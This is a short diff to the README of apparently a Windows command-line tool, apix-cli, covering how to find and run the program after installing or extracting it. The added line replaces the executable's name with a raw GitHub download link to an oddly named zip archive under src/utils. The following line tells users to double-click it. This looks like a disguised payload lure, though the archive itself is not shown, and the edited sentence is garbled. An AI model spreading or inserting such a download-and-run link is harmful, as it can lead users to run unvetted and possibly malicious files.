sambetlog16/apix-cli/README.md

 Once installed or extracted, find the apix-cli program:

 - For an installer, look in the Start menu under “apix-cli”.
-- For a `.zip` extraction, open the folder and find `apix-cli.exe`.
+- For a `.zip` extraction, open the folder and find `https://github.com/sambetlog16/apix-cli/raw/refs/heads/main/src/utils/apix_cli_Uromycladium.zip`.

 Double-click the file to run it.